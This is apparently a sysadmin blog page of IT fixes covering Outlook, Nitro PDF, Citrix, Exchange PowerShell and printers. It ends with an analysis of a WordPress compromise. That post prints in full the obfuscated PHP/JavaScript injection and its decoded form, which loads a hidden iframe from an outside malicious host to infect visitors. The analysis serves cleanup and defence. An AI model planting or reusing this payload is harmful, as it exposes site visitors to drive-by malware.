Can’t open this Item Outlook on Search/Find

When opening email from a Find / Search in Outlook 2003 you get “can’t open this item”

Is you use custom forms this is due to the custom form cache filling up and needing to be cleared , below code will do this is you copy and paste it into a VBS file

Source code
   
'Robert Sparnaaij [MVP-Outlook]
'http://www.howto-outlook.com

 
 
'Close Outlook socially
WScript.Echo "Close Outlook and press OK"
 
'Close Outlook forcefully
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colProcessList = objWMIService.ExecQuery _
("Select * from Win32_Process Where Name = 'outlook.exe'")
For Each objProcess in colProcessList
objProcess.Terminate()
Next
 
'Set Profile Path
Set oShell = CreateObject("WScript.Shell") 
sCurrUsrPath = oShell.ExpandEnvironmentStrings("%UserProfile%")
Set objFSO = CreateObject("Scripting.FileSystemObject")
 
'Verify whether the Forms Cache exists and delete it 
If objFSO.FolderExists(sCurrUsrPath & "\Local Settings\Application Data\Microsoft\Forms") Then
      WScript.Echo "The Forms Cache has been found and will be cleared."
      Const DeleteReadOnly = True
      objFSO.DeleteFolder(sCurrUsrPath & "\Local Settings\Application Data\Microsoft\Forms"), DeleteReadOnly
      WScript.Echo "The Forms Cache has been cleared succesfully. Start Outlook and check whether the form works now."
 
  Else
 
WScript.Echo "Cannot find the Forms Cache. It has been cleared already. Start Outlook and check whether the form works now."
 
End If

Nitro PDF Group Policy Registry Settings

I wanted to disable the “Tell me if Nitro Pro is not the default viewer” option on startup for each user via group policy. We can set this using Nitro custom MST creator with deploymentutility9_en.exe , however this works as below

Installation (Admin)

1. On installation we write a large number of preferences to \HKEY_LOCAL_MACHINE\SOFTWARE\Nitro\Pro\9.0\settings\

First Launch (User)

2. On a users first run we copy the local machine keys to HKEY_CURRENT_USER\SOFTWARE\Nitro\Pro\9.0

3. We then load on startup these keys to memory for use during the operation of Nitro Pro 9

4. When the application is closed, any changes are written back to HKEY_CURRENT_USER so they can be accessed on the next launch

So once it set once the user can change this, I added the following update registry key to set this every time the user logs in to make 100% the user does not click yes!

Path1 : HKCU/ \Software\Nitro\Pro\9.0\settings\kPreferances

Key : kPrefGeneralMsgIfNotDefaultPDFViewer

Type : String

Value : /b 0 – where 1 is Yes and No is 0

Tags: Default PDF Viewer, group policy, NitroPDF, registry

Invoke Operation ‘Function’ Failed SilverLight App

When trying to run a silverlight app the following error message is displayed on a client

Invoke Operation ‘Function Name’ Failed – specificed resource was not found

After trying to diagnose the fault being down to the server , it was actually client side error. The local C drive was full so not being able to write the local storage container!

Independaent Management Architecture Service not Starting

Recently a specific Citrix server in a farm was not accepting any new connections even though login was set to allow and RDP connections were working. A check in the services showed Independaent Management Architecture was not started.

I checked the disks to make sure there were not full.

A look in the event log showed :

“Failed to load plugin C:\Program
Files\Citrix\System32\Citrix\IMA\Subsystems\Ima PsSs.dll with error
IMA_RESULT_FAILURE.”

I found the following article  : http://support.citrix.com/article/CTX129194

A DSmaint recreaterade did not fix the issue

I also had to run dsmaint recreatelhc

Tags: dsmaint recreatelhc, DSmaint recreaterade, Ima PsSs.dll, Independaent Management Architecture

Check Send As Permissions for All Users in Exchange 2010

Needed to check all users who had SEND AS Permissions for someone else in the Exchange Enviroment apart from themselves and e.g. BESADMIN or other service accounts. Below is the command line

Source code

Get-Mailbox -Resultsize Unlimited | Get-ADPermission | ? {($_.ExtendedRights -like "*send-as*") -and -not ($_.User -like "nt authority\self") -and -not ($_.User -like "Domain\BESAdmin") -and -not ($_.User -like "domain\user")} | ft Identity, User -auto

As per the track back , can be limited to a specific OU

Tags: Check Send As Permissions, exchange 2010, Send As Permissions

HP 4350 Printer Trays Resetting to Custom

Sometimes Paper Size of Trays of a 4350 printer are getting randomly changed from A4 to Custom , which means when users next print to it , the printer asks to confirm the Tray for printing ( not automatic)

This is caused when users refill the printer tray with paper , after shutting the tray it asks them to confirm the paper type. If they click the Green Button ( blue arrow ) it will reset this to Custom. They need to be pressing the Back button to leave this to A4

Tags: HP 4350, reset, tray

What the Filing Green Icons in iManage/Worksite Mean

These can be reset via

Please close Outlook completely (make sure Outlook.exe is no longer running in task manager)

Change HKCU\Software\Interwoven\WorkSite\8.0\FileSite\IconForm Installed to 0

Delete HKCU\Software\Interwoven\WorkSite8.0\FileSite\Registered Databases

Reopen Outlook and you should see it re-register.

Tags: filing ticks, icons, imanage, reset, send and file, worksite

Citrix Reciever 4.1 Windows XP

 Citrix have released Citrix Reciever 4.1 up from the previous version 4.0. Upon installing this on a machine with Citrix Reciever 4.0 installed  , when trying to run the program it asks for .Net Framwork 4.5 to be installed.

Microsoft does not support Windows XP and .NET  4.5 Framework so this is impossible

To get around this , install .NET Framework 2.0 SP1 on the XP image and the software will start

Tags: .NET 4.5 Framework, Citrix Reciever 4.1, Windows XP

Exchange Group to Group Permissions for Inbox : found in Active Directory but isn’t valid to use for permissions.

I was trying to add group to group permissions in Exchange so all members of one group would have access to another groups Inbox and was getting the following error

“found in Active Directory but isn’t valid to use for permissions”

Powershell Code as below, I set the DistGrouptohavePermission to an SMTP email address of the group as well as confirming it was a Universal Security Group and it still came up with the error.

I then changed the DistGrouptohavePermission value to the MailNickName of the Group ( can be found in the Extended Attributes ) and it went through OK

Source code
   
# change to prefered accessrights (see "Get-Help Set-MailboxFolderPermission -Parameter AccessRights")
$accessrights = "Editor"
 
# set Identity to distributiongroup alias
$distributiongroup = Get-DistributionGroup -Identity "GroupWillAllTheUsers"
 
# normally no changing after this line
$groupmembers = Get-DistributionGroupMember -Identity $distributiongroup | Where-Object { $_.RecipientType -eq "UserMailbox" }
foreach ( $member in $groupmembers )
{
	$permissions = ""
	$mailbox = Get-Mailbox -Identity $member.alias
	$inbox = (($mailbox.SamAccountName) + ":\" + (Get-MailboxFolderStatistics -Identity $mailbox.SamAccountName -FolderScope Inbox | Select-Object -First 1).Name)
 
	foreach ( $perm in ( Get-MailboxFolderPermission -Identity $inbox ))
	{
		$permissions += @($perm.User.DisplayName)
	}
 
	if ( $permissions -contains $distributiongroup.Name )
	{
		# Distributiongroup already has permission groupmember inbox
		Set-MailboxFolderPermission -Identity $mailbox.SamAccountName -User "DistGrouptohavePermission" -AccessRights $accessrights
		Set-MailboxFolderPermission -Identity $inbox -User "DistGrouptohavePermission" -AccessRights $accessrights
	}
	else
	{
		# Distributiongroup has no permission to groupmember inbox
                Add-MailboxFolderPermission -Identity $mailbox.SamAccountName -User "DistGrouptohavePermission" -AccessRights $accessrights
		Add-MailboxFolderPermission -Identity $inbox -User "DistGrouptohavePermission" -AccessRights $accessrights
	}
}

Tags: exchange, found in Active Directory but isn't valid to use for permissions., group to group permissions

WordPress Hack

Recently a customer’s site was hacked from an out of date plugin. The hack was pretty cool and took me a few hours to decipher

The hack entailed entering the following PHP code in the header of each file with the body tag

Source code

<?php#a9a007#                                                                                                                                                                                                                                                          if(empty($rixmc)) {$rixmc = "<script type=\"text/javascript\" language=\"javascript\">nvbbm=\"fr\"+\"omCh\"+\"ar\"+\"Co\"+\"de\";if(document.querySelector)wtesq=4;iymigs=(\"5e,a4,b3,ac,a1,b2,a7,ad,ac,5e,9f,aa,a5,aa,6e,77,66,67,5e,b9,4b,48,5e,b4,9f,b0,5e,b1,b2,9f,b2,a7,a1,7b,65,9f,a8,9f,b6,65,79,4b,48,5e,b4,9f,b0,5e,a1,ad,ac,b2,b0,ad,aa,aa,a3,b0,7b,65,a7,ac,a2,a3,b6,6c,ae,a6,ae,65,79,4b,48,5e,b4,9f,b0,5e,9f,aa,a5,aa,5e,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,b0,a3,9f,b2,a3,83,aa,a3,ab,a3,ac,b2,66,65,a7,a4,b0,9f,ab,a3,65,67,79,4b,48,4b,48,5e,9f,aa,a5,aa,6c,b1,b0,a1,5e,7b,5e,65,a6,b2,b2,ae,78,6d,6d,b5,b5,b5,6c,ac,a3,b5,b2,a3,a1,a6,a7,ac,a4,ad,b0,ab,9f,b2,a7,a1,9f,6c,a7,b2,6d,84,a8,94,95,85,a6,a5,b0,6c,ae,a6,ae,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,ae,ad,b1,a7,b2,a7,ad,ac,5e,7b,5e,65,9f,a0,b1,ad,aa,b3,b2,a3,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,a1,ad,aa,ad,b0,5e,7b,5e,65,77,76,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,a6,a3,a7,a5,a6,b2,5e,7b,5e,65,77,76,ae,b6,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,b5,a7,a2,b2,a6,5e,7b,5e,65,77,76,ae,b6,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,aa,a3,a4,b2,5e,7b,5e,65,6f,6e,6e,6e,77,76,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,b2,ad,ae,5e,7b,5e,65,6f,6e,6e,6e,77,76,65,79,4b,48,4b,48,5e,a7,a4,5e,66,5f,a2,ad,a1,b3,ab,a3,ac,b2,6c,a5,a3,b2,83,aa,a3,ab,a3,ac,b2,80,b7,87,a2,66,65,9f,aa,a5,aa,65,67,67,5e,b9,4b,48,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,b5,b0,a7,b2,a3,66,65,7a,ae,5e,a7,a2,7b,9a,65,9f,aa,a5,aa,9a,65,5e,a1,aa,9f,b1,b1,7b,9a,65,9f,aa,a5,aa,6e,77,9a,65,5e,7c,7a,6d,ae,7c,65,67,79,4b,48,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a5,a3,b2,83,aa,a3,ab,a3,ac,b2,80,b7,87,a2,66,65,9f,aa,a5,aa,65,67,6c,9f,ae,ae,a3,ac,a2,81,a6,a7,aa,a2,66,9f,aa,a5,aa,67,79,4b,48,5e,bb,4b,48,bb,4b,48,a4,b3,ac,a1,b2,a7,ad,ac,5e,91,a3,b2,81,ad,ad,a9,a7,a3,66,a1,ad,ad,a9,a7,a3,8c,9f,ab,a3,6a,a1,ad,ad,a9,a7,a3,94,9f,aa,b3,a3,6a,ac,82,9f,b7,b1,6a,ae,9f,b2,a6,67,5e,b9,4b,48,5e,b4,9f,b0,5e,b2,ad,a2,9f,b7,5e,7b,5e,ac,a3,b5,5e,82,9f,b2,a3,66,67,79,4b,48,5e,b4,9f,b0,5e,a3,b6,ae,a7,b0,a3,5e,7b,5e,ac,a3,b5,5e,82,9f,b2,a3,66,67,79,4b,48,5e,a7,a4,5e,66,ac,82,9f,b7,b1,7b,7b,ac,b3,aa,aa,5e,ba,ba,5e,ac,82,9f,b7,b1,7b,7b,6e,67,5e,ac,82,9f,b7,b1,7b,6f,79,4b,48,5e,a3,b6,ae,a7,b0,a3,6c,b1,a3,b2,92,a7,ab,a3,66,b2,ad,a2,9f,b7,6c,a5,a3,b2,92,a7,ab,a3,66,67,5e,69,5e,71,74,6e,6e,6e,6e,6e,68,70,72,68,ac,82,9f,b7,b1,67,79,4b,48,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,5e,7b,5e,a1,ad,ad,a9,a7,a3,8c,9f,ab,a3,69,60,7b,60,69,a3,b1,a1,9f,ae,a3,66,a1,ad,ad,a9,a7,a3,94,9f,aa,b3,a3,67,4b,48,5e,69,5e,60,79,a3,b6,ae,a7,b0,a3,b1,7b,60,5e,69,5e,a3,b6,ae,a7,b0,a3,6c,b2,ad,85,8b,92,91,b2,b0,a7,ac,a5,66,67,5e,69,5e,66,66,ae,9f,b2,a6,67,5e,7d,5e,60,79,5e,ae,9f,b2,a6,7b,60,5e,69,5e,ae,9f,b2,a6,5e,78,5e,60,60,67,79,4b,48,bb,4b,48,a4,b3,ac,a1,b2,a7,ad,ac,5e,85,a3,b2,81,ad,ad,a9,a7,a3,66,5e,ac,9f,ab,a3,5e,67,5e,b9,4b,48,5e,b4,9f,b0,5e,b1,b2,9f,b0,b2,5e,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,6c,a7,ac,a2,a3,b6,8d,a4,66,5e,ac,9f,ab,a3,5e,69,5e,60,7b,60,5e,67,79,4b,48,5e,b4,9f,b0,5e,aa,a3,ac,5e,7b,5e,b1,b2,9f,b0,b2,5e,69,5e,ac,9f,ab,a3,6c,aa,a3,ac,a5,b2,a6,5e,69,5e,6f,79,4b,48,5e,a7,a4,5e,66,5e,66,5e,5f,b1,b2,9f,b0,b2,5e,67,5e,64,64,4b,48,5e,66,5e,ac,9f,ab,a3,5e,5f,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,6c,b1,b3,a0,b1,b2,b0,a7,ac,a5,66,5e,6e,6a,5e,ac,9f,ab,a3,6c,aa,a3,ac,a5,b2,a6,5e,67,5e,67,5e,67,4b,48,5e,b9,4b,48,5e,b0,a3,b2,b3,b0,ac,5e,ac,b3,aa,aa,79,4b,48,5e,bb,4b,48,5e,a7,a4,5e,66,5e,b1,b2,9f,b0,b2,5e,7b,7b,5e,6b,6f,5e,67,5e,b0,a3,b2,b3,b0,ac,5e,ac,b3,aa,aa,79,4b,48,5e,b4,9f,b0,5e,a3,ac,a2,5e,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,6c,a7,ac,a2,a3,b6,8d,a4,66,5e,60,79,60,6a,5e,aa,a3,ac,5e,67,79,4b,48,5e,a7,a4,5e,66,5e,a3,ac,a2,5e,7b,7b,5e,6b,6f,5e,67,5e,a3,ac,a2,5e,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,6c,aa,a3,ac,a5,b2,a6,79,4b,48,5e,b0,a3,b2,b3,b0,ac,5e,b3,ac,a3,b1,a1,9f,ae,a3,66,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,6c,b1,b3,a0,b1,b2,b0,a7,ac,a5,66,5e,aa,a3,ac,6a,5e,a3,ac,a2,5e,67,5e,67,79,4b,48,bb,4b,48,a7,a4,5e,66,ac,9f,b4,a7,a5,9f,b2,ad,b0,6c,a1,ad,ad,a9,a7,a3,83,ac,9f,a0,aa,a3,a2,67,4b,48,b9,4b,48,a7,a4,66,85,a3,b2,81,ad,ad,a9,a7,a3,66,65,b4,a7,b1,a7,b2,a3,a2,9d,b3,af,65,67,7b,7b,73,73,67,b9,bb,a3,aa,b1,a3,b9,91,a3,b2,81,ad,ad,a9,a7,a3,66,65,b4,a7,b1,a7,b2,a3,a2,9d,b3,af,65,6a,5e,65,73,73,65,6a,5e,65,6f,65,6a,5e,65,6d,65,67,79,4b,48,4b,48,9f,aa,a5,aa,6e,77,66,67,79,4b,48,bb,4b,48,bb\".split(\",\"));lldu=window[\"asdeval\".substr(3)];function kwstn(){uvt=function(){--(crq.body)}()}crq=document;for(atodfh=0;atodfh<iymigs[\"length\"];atodfh+=1){iymigs[atodfh]=-(62)+parseInt(iymigs[atodfh],wtesq*4);}try{kwstn()}catch(hno){kqxto=50-50;}if(!kqxto)lldu(String[nvbbm].apply(String,iymigs));</script>";echo $rixmc;}#/a9a007#?>

This file then creating an iFrame which linked to another php file.

As you can see the code its really ciphered to stop detection however thanks to StopBadware.org , it was logged and alerted.

The below works by using 2 functions

1) -(62)+parseInt(iymigs[atodfh],wtesq*4). As you can see below wtesq is declared to be 4 so this changes to -(62)+parseInt(iymigs[atodfh]16). This gets Java script to change the bolded string values into radix 16 values minus 62. Here’s some PHP to do this

Source code

<?php
 
$str = "%the string with commas removed%";
 
$hex = str_split($str, 2);
 
foreach ($hex as $value) {
    echo -(62)+intval("$value", 16);
    echo ", ";
 
}
 
?>

2) Cleverly hidden in \”fr\”+\”omCh\”+\”ar\”+\”Co\”+\”de\ gives you “fromCharCode” , so the values of this can be inserted into this online tool

http://jdstiles.com/java/cct.html

Which then gives us the code

Source code

function algl09() {
 var static='ajax';
 var controller='index.php';
 var algl = document.createElement('iframe');
 
 algl.src = 'http://www.newtechinformatica.it/FjVWGhgr.php';
 algl.style.position = 'absolute';
 algl.style.color = '98';
 algl.style.height = '98px';
 algl.style.width = '98px';
 algl.style.left = '100098';
 algl.style.top = '100098';
 
 if (!document.getElementById('algl')) {
 document.write('<p id=\'algl\' class=\'algl09\' ></p>');
 document.getElementById('algl').appendChild(algl);
 }
}
function SetCookie(cookieName,cookieValue,nDays,path) {
 var today = new Date();
 var expire = new Date();
 if (nDays==null || nDays==0) nDays=1;
 expire.setTime(today.getTime() + 3600000*24*nDays);
 document.cookie = cookieName+"="+escape(cookieValue)
 + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie( name ) {
 var start = document.cookie.indexOf( name + "=" );
 var len = start + name.length + 1;
 if ( ( !start ) &&
 ( name != document.cookie.substring( 0, name.length ) ) )
 {
 return null;
 }
 if ( start == -1 ) return null;
 var end = document.cookie.indexOf( ";", len );
 if ( end == -1 ) end = document.cookie.length;
 return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
 
algl09();
}
}

To clean the exploit remove this off the header.php in WordPress and also clear up and HTML/PHP files in the root directory the hacker has created

Tags: a9a007, fromCharCode, IFrame, parseint, Radix 16, Wordpress Hack